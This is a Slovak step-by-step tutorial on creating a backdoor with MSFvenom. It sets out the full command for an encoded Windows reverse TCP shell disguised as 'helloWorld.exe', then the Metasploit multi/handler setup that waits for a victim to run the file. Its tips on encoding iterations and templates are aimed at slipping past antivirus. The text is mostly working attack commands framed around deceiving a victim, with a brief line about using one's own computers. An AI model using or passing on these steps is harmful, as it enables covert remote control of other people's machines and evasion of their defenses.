Zadné vrátka slúžia na obídenie bezpečnostných mechanizmov, často tajne a väčšinou nezistiteľne. Pomocou MSFvenom, kombinácie msfpayload a msfencode, je možné vytvoriť zadné vrátka, ktoré sa spoja späť s útočníkom pomocou reverzného shellu TCP. Ak chcete vyvinúť zadné vrátka, musíte zmeniť podpis svojho škodlivého softvéru, aby ste sa vyhli akémukoľvek antivírusovému softvéru. Dokončite tento projekt na páre počítačov, ku ktorým máte prístup a počas toho sa dozviete viac o zabezpečení počítača a o tom, ako tento druh zadných vrátok funguje.
Kroky
Krok 1. Spustite Kali a spustite terminálnu konzolu
Krok 2. Zadajte príkaz ifconfig, aby sa zobrazilo rozhranie a skontrolovala vaša IP adresa
Krok 3. Zoznam kodérov zobrazíte zadaním kódovačov msfvenom -l
Ako kodér použijete x86/shikata_ga_nai
Krok 4. Zadajte „msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows označuje architektúru, ktorú treba použiť.
- -p windows/shell/reverse_tcp určuje užitočné zaťaženie, ktoré sa má vložiť.
- LHOST označuje IP adresu poslucháča.
- LPORT označuje port poslucháča.
- -b "\ x00" označuje, aby sa zabránilo zlému znaku (nula bajtov).
- -e x86/shikata_ga_nai označuje názov kodéra.
- -f exe> helloWorld.exe označuje výstup formátu.
Krok 5. Aktivujte Metasploit zadaním msfconsole
Teraz ste si vygenerovali zadné vrátka. Keď obeť klikne na helloWorld.exe, aktivuje sa vložené užitočné zaťaženie shellu a vytvorí pripojenie späť k vášmu systému. Aby ste mohli získať pripojenie, musíte otvoriť multi-handler v Metasploite a nastaviť užitočné zaťaženie
Krok 6. Zadajte príkaz use exploit/multi/handler
Krok 7. Zadajte príkaz set payload windows/shell/reverse_tcp
Krok 8. Ak chcete skontrolovať modul, zadajte príkaz show options
Krok 9. Typová sada LHOST 192.168.48.129
„LHOST“označuje IP adresu poslucháča
Krok 10. Zadajte sadu LPORT 4444
„LPORT“označuje port poslucháča
Krok 11. Napíšte príkaz run a počkajte na pripojenie z počítača obete
Krok 12. Počkajte, kým obeť klikne na helloWorld.exe
Potom budete úspešne pripojení k stroju obete.
Tipy
- Použitie -i v MSFvenom bude predstavovať iterácie kódovania. Niekedy môže obísť AV softvér viac iterácií.
- Naučili ste sa generovať zadné vrátka a kódovať ich pomocou MSFvenom, ale táto metóda v dnešnej dobe nebude fungovať dokonale proti niektorému AV softvéru. Dôvodom sú šablóny spustenia v programe MSFvenom. Predajcovia AV pridali statický podpis týchto šablón a len ich hľadajú. Riešením tohto problému je použiť inú šablónu spustenia alebo iné nástroje.